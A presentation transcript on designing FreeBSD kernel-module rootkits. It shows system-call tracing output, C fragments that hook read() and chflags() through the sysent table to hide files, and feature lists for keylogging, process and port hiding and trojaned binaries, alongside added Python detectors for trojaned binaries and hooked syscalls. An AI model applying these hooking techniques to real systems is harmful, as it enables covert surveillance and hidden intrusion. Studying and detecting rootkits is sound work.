Tripwyre



1. UNIX Rootkits – Design and Implementation
   Satish Srinivasan, sathya@freeshell.org, twitter.com/tripwyre
2. Overview of Presentation
   * Why LKM Rootkits?
   * Rootkit Design
   * How Hooking Works?
   * Identifying System Calls
   * Hijacking System Calls
   * Implementing System Calls
   * System Calls to Hijack
3. Why LKM Rootkits?
   * Direct Access to Kernel
   * Monitoring actions of users
   * Advanced Stealth Mechanisms
   * Monitoring intrusions on Honeypots
   * Overriding OS Protections
   * Studying proprietary protocols
   * Practical Education on OS Kernels!
4. Rootkit Design
   (layered diagram) User -> User Mode Control Interface -> Loadable Kernel Module Driver -> Operating System Kernel -> System
5. How Hooking Works?
   (diagram)
   Normal execution: User Mode Program -> System Call Function
   Hooked execution: User Mode Program -> Our Hooked System Call -> System Call Function
6. Identifying System Calls
   Kernel Process Tracing
   * kdump – Dump a part or all of the kernel memory to analyze the calling of system calls in the user-mode programs.
   * ktrace – Trace the execution of the program to find the system calls it calls and the operations it does.
7. Using ktrace and kdump

```
$ ktrace who
exampleuser ttyv0 Jan 28 21:36
exampleuser ttyp0 Jan 28 21:45 (10.0.0.3)
$ kdump
   548 ktrace   RET   ktrace 0
   548 ktrace   CALL  execve(0xbfbfe7e0,0xbfbfed2c,0xbfbfed34)
   548 ktrace   NAMI  "/usr/bin/who"
   548 ktrace   NAMI  "/libexec/ld-elf.so.1"
   548 who      RET   execve 0
   548 who      CALL  mmap(0,0xe18,0x3,0x1000,0xffffffff,0,0,0)
   548 who      RET   mmap 671535104/0x2806d000
   548 who      CALL  munmap(0x2806d000,0xe18)
   548 who      RET   munmap 0
   548 who      CALL  __sysctl(0xbfbfead8,0x2,0x28069998,0xbfbfead4,0,0)
   548 who      RET   __sysctl 0
   548 who      CALL  mmap(0,0x8000,0x3,0x1002,0xffffffff,0,0,0)
   548 who      RET   mmap 671535104/0x2806d000
   548 who      CALL  issetugid
   548 who      RET   issetugid 0
   548 who      CALL  open(0x28065c28,0,0x1b6)
   548 who      NAMI  "/etc/libmap.conf"
   548 who      RET   open -1 errno 2 No such file or directory
   548 who      CALL  open(0x28064e80,0,0)
   548 who      NAMI  "/var/run/ld-elf.so.hints"
   548 who      RET   open 3
   548 who      CALL  read(0x3,0xbfbfeaa0,0x80)
   548 who      GIO   fd 3 read 128 bytes
```
8. Using ktrace and kdump (continued)

```
...
   548 who      RET   mprotect 0
   548 who      CALL  mmap(0,0x56c0,0x3,0x1000,0xffffffff,0,0,0)
   548 who      RET   mmap 672452608/0x2814d000
   548 who      CALL  munmap(0x2814d000,0x56c0)
   548 who      RET   munmap 0
   548 who      CALL  mprotect(0x28075000,0xc0000,0x5)
   548 who      RET   mprotect 0
   548 who      CALL  sigprocmask(0x1,0x28068820,0xbfbfeb20)
   548 who      RET   sigprocmask 0
   548 who      CALL  sigprocmask(0x3,0x28068830,0)
   548 who      RET   sigprocmask 0
   548 who      CALL  open(0x8049520,0,0x1b6)
   548 who      NAMI  "/var/run/utmp"
   548 who      RET   open 3
   548 who      CALL  fstat(0x3,0xbfbfead0)
...
   548 who      RET   read 748/0x2ec
   548 who      CALL  fstat(0x1,0xbfbfe330)
   548 who      RET   fstat 0
   548 who      CALL  break(0x804e000)
   548 who      RET   break 0
   548 who      CALL  ioctl(0x1,TIOCGETA,0xbfbfe370)
   548 who      RET   ioctl 0
   548 who      CALL  access(0x2813318c,0x4)
   548 who      NAMI  "/etc/localtime"
   548 who      RET   access 0
   548 who      CALL  open(0x2813318c,0,0)
   548 who      NAMI  "/etc/localtime"
...
```
9. Using ktrace and kdump (continued)

```
...
   548 who      CALL  fstat(0x4,0xbfbfea50)
   548 who      RET   fstat 0
   548 who      CALL  read(0x4,0xbfbfc730,0x1f08)
   548 who      GIO   fd 4 read 109 bytes
       0x0000 545a 6966 0000 0000 0000 0000 0000 0000 |TZif............|
       0x0010 0000 0000 0000 0004 0000 0004 0000 0000 |................|
       0x0020 0000 0004 0000 0004 0000 000d cadb 86b0 |................|
       0x0030 cc05 7118 cc95 32a8 d274 1298 0102 0302 |..q...2..t......|
       0x0040 0000 52d0 0000 0000 5b68 0004 0000 4d58 |..R.....[h....MX|
       0x0050 0009 0000 5b68 0109 484d 5400 4255 5254 |....[h..HMT.BURT|
       0x0060 0049 5354 0000 0000 0000 0000 00        |.IST.........|
   548 who      RET   read 109/0x6d
   548 who      CALL  close(0x4)
   548 who      RET   close 0
   548 who      CALL  write(0x1,0x804d000,0x28)
   548 who      GIO   fd 1 wrote 40 bytes
       "exampleuser ttyv0 Jan 28 21:36 "
   548 who      RET   write 40/0x28
   548 who      CALL  write(0x1,0x804d000,0x32)
   548 who      GIO   fd 1 wrote 50 bytes
       "exampleuser ttyp0 Jan 28 21:45 (10.0.0.3) "
   548 who      RET   write 50/0x32
   548 who      CALL  read(0x3,0x804c000,0x1000)
   548 who      GIO   fd 3 read 0 bytes
       ""
   548 who      RET   read 0
   548 who      CALL  close(0x3)
   548 who      RET   close 0
   548 who      CALL  exit(0)
```
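The three kdump slides above show the raw trace; what a defender usually wants from it is a profile of the binary (which system calls it makes, which path names it resolves, which calls fail) that can be compared against a known-good baseline, so that a replaced or trojaned who(1) that quietly touches extra files stands out. The following parser is an added example and not code from the slides; the sample trace is constructed in the kdump(1) output format shown above, and the `WHO_BASELINE` path list is an assumed allow-list for a clean who(1), not something the presentation states.

```python
import re
from collections import Counter

# Constructed sample in the format kdump(1) prints for `ktrace who`.
# The lines mirror the kind of output shown on the slides; it is not a real capture.
SAMPLE_KDUMP = """\
   548 ktrace   RET   ktrace 0
   548 ktrace   CALL  execve(0xbfbfe7e0,0xbfbfed2c,0xbfbfed34)
   548 ktrace   NAMI  "/usr/bin/who"
   548 who      RET   execve 0
   548 who      CALL  open(0x28065c28,0,0x1b6)
   548 who      NAMI  "/etc/libmap.conf"
   548 who      RET   open -1 errno 2 No such file or directory
   548 who      CALL  open(0x28064e80,0,0)
   548 who      NAMI  "/var/run/ld-elf.so.hints"
   548 who      RET   open 3
   548 who      CALL  open(0x8049520,0,0x1b6)
   548 who      NAMI  "/var/run/utmp"
   548 who      RET   open 3
   548 who      CALL  write(0x1,0x804d000,0x28)
   548 who      GIO   fd 1 wrote 40 bytes
       "exampleuser ttyv0 Jan 28 21:36 "
   548 who      RET   write 40/0x28
   548 who      CALL  exit(0)
"""

# Assumed allow-list of paths a clean who(1) is expected to resolve (hypothetical baseline).
WHO_BASELINE = [
    "/usr/bin/who", "/libexec/ld-elf.so.1", "/etc/libmap.conf",
    "/var/run/ld-elf.so.hints", "/var/run/utmp", "/etc/localtime",
]

# pid, command name, record kind, and the rest of the record.
LINE_RE = re.compile(r'^\s*(\d+)\s+(\S+)\s+(CALL|RET|NAMI|GIO)\s+(.*)$')
CALL_RE = re.compile(r'^(\w+)')
# "name value[/0xhex][ errno N message]"
RET_RE = re.compile(r'^(\w+)\s+(-?\d+)(?:/0x[0-9a-f]+)?(?:\s+errno\s+(\d+)\s+(.*))?')


def parse_kdump(text):
    """Build one profile per command name: syscall counts, resolved paths, failed calls."""
    profiles = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # GIO data continuation lines carry no record header
        _pid, comm, kind, rest = m.groups()
        prof = profiles.setdefault(comm, {"calls": Counter(), "paths": [], "failures": []})
        if kind == "CALL":
            prof["calls"][CALL_RE.match(rest).group(1)] += 1
        elif kind == "NAMI":
            prof["paths"].append(rest.strip().strip('"'))
        elif kind == "RET":
            r = RET_RE.match(rest)
            if r and r.group(3):
                prof["failures"].append((r.group(1), int(r.group(3)), r.group(4)))
    return profiles


def unexpected_paths(profile, allowed):
    """Paths the traced program resolved that are not in its baseline allow-list."""
    return sorted(set(profile["paths"]) - set(allowed))


if __name__ == "__main__":
    who = parse_kdump(SAMPLE_KDUMP)["who"]
    print("syscalls:", dict(who["calls"]))
    print("failures:", who["failures"])
    print("off-baseline paths:", unexpected_paths(who, WHO_BASELINE))
```

Note that the trace is attributed to the command name in the second column, so the execve and the NAMI for /usr/bin/who land under `ktrace` (the process had not yet exec'd), while everything after the exec is under `who`. A hooked read() or getdirentries() in the kernel is invisible at this layer: ktrace records what the program asked for, not what a hooked handler did with it, so a baseline built this way detects a modified binary, not a modified kernel.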
10. Hijacking System Calls

```c
#include <sys/syscall.h>
#include <sys/kernel.h>
#include <sys/sysent.h>
#include <sys/module.h>

void load(struct module *module, int cmd, void *args)
{
    switch (cmd) {
    case MOD_LOAD:
        /* System Call Hooking; Example read() syscall. */
        sysent[SYS_read].sy_call = (sys_call_t *) hooked_read;
        break;
    case MOD_UNLOAD:
        /* System Call Restore; Example getdirentries() syscall */
        sysent[SYS_getdirentries].sy_call = (sys_call_t *) getdirentries;
        break;
    }
}
```
11. Implementing System Calls

```c
/* Example: Hooking chflags(2) */
int hooked_chflags(struct thread *td, void *syscall_args)
{
    struct chflags_args *uap;
    uap = (struct chflags_args *) syscall_args;
    char name[NAME_MAX];
    size_t size;

    if (copyinstr(uap->path, name, NAME_MAX, &size) == EFAULT)
        return (EFAULT);
    if (file_hidden(name))
        return (ENOENT);
    return (chflags(td, syscall_args));
}
```
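Slides 10 and 11 show the mechanism from the attacker's side: the module overwrites `sysent[n].sy_call` so the kernel dispatches into the module's handler, which filters and then calls the original. The same table is therefore the natural thing for a defender to audit. The check below is an added example, not code from the presentation: it takes a snapshot of `sysent[]` handler addresses (how that snapshot is obtained, e.g. with a kernel debugger or a trusted in-kernel reader, is assumed and outside this script) and compares each entry with the kernel's own symbol table as printed by nm(1) on /boot/kernel/kernel. Both the symbol listing and the snapshot are constructed with invented addresses; the syscall numbers are FreeBSD's, and the handler symbol names follow the slides' convention of the bare syscall name (newer FreeBSD kernels prefix them with `sys_`, so adjust the mapping for those).

```python
# Constructed nm(1)-style listing of the kernel: "address type name".
# Addresses are invented for this example. btext/etext bound the kernel text segment.
KERNEL_NM = """\
c0400000 T btext
c04a1000 T read
c04a1200 T write
c04a1400 T open
c04a1600 T chflags
c04a1800 T getdirentries
c0600000 T etext
"""

# Syscall numbers from FreeBSD's syscalls.master for the entries checked here.
SYSCALL_NAMES = {3: "read", 4: "write", 5: "open", 34: "chflags", 196: "getdirentries"}

# Constructed snapshot of sysent[n].sy_call from a running kernel (hypothetical source:
# a debugger or trusted kernel reader). Two entries are tampered with for the demonstration.
SYSENT_SNAPSHOT = {
    3: 0xc04a1000,
    4: 0xc04a1210,    # inside kernel text, but not where the write symbol lives
    5: 0xc04a1400,
    34: 0xc04a1600,
    196: 0xc8a02000,  # outside [btext, etext): a handler living in a loaded module
}


def parse_nm(text):
    """Map symbol name -> address from 'addr type name' lines."""
    syms = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3:
            addr, _type, name = parts
            syms[name] = int(addr, 16)
    return syms


def check_sysent(snapshot, syms, names):
    """Return (number, name, reason, address) for each entry whose handler is not the kernel's own."""
    lo, hi = syms["btext"], syms["etext"]
    findings = []
    for num in sorted(snapshot):
        addr = snapshot[num]
        name = names.get(num, "#%d" % num)
        expected = syms.get(name)
        if not lo <= addr < hi:
            # The classic LKM hook: sy_call now points into module memory.
            findings.append((num, name, "handler outside kernel text", hex(addr)))
        elif expected is not None and addr != expected:
            # Still inside the kernel image, but not at the symbol the table should reference.
            findings.append((num, name, "handler differs from kernel symbol", hex(addr)))
    return findings


if __name__ == "__main__":
    for f in check_sysent(SYSENT_SNAPSHOT, parse_nm(KERNEL_NM), SYSCALL_NAMES):
        print("syscall %3d %-14s %s (%s)" % f)
```

The text-range test is deliberately independent of kldstat(1): the feature list later in the deck includes hiding the module from kldstat, so "is this address inside a listed module" is not a trustworthy question to ask, whereas "is it inside the kernel image" is. The check does not catch a hook that patches the first bytes of the original handler in place, since the table entry then still matches the symbol; covering that needs a hash of the handler code itself.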
12. System Calls To Hijack
   * open, stat, chflags : File Hiding
   * chmod, chown : Change ownership
   * getdirentries : List Directories
   * read, write, writev : Keylogging
   * kill, fork : Process Hiding
   * ...
13. Feature List
   * Hide itself from kldstat(1)
   * Hide a port from netstat(1)
   * Hide files and directories
   * Monitor network for ICMP messages
   * Capture user keystrokes
   * Hide a process from ps(1)
14. Feature List (contd..)
   * execve(1) redirection for Trojan'ed binaries
   * Hide a user from who(1)
   * Controller Mechanism with Authentication using crypt(3)
   * AES Encryption for Keylogs
15. Thank You!
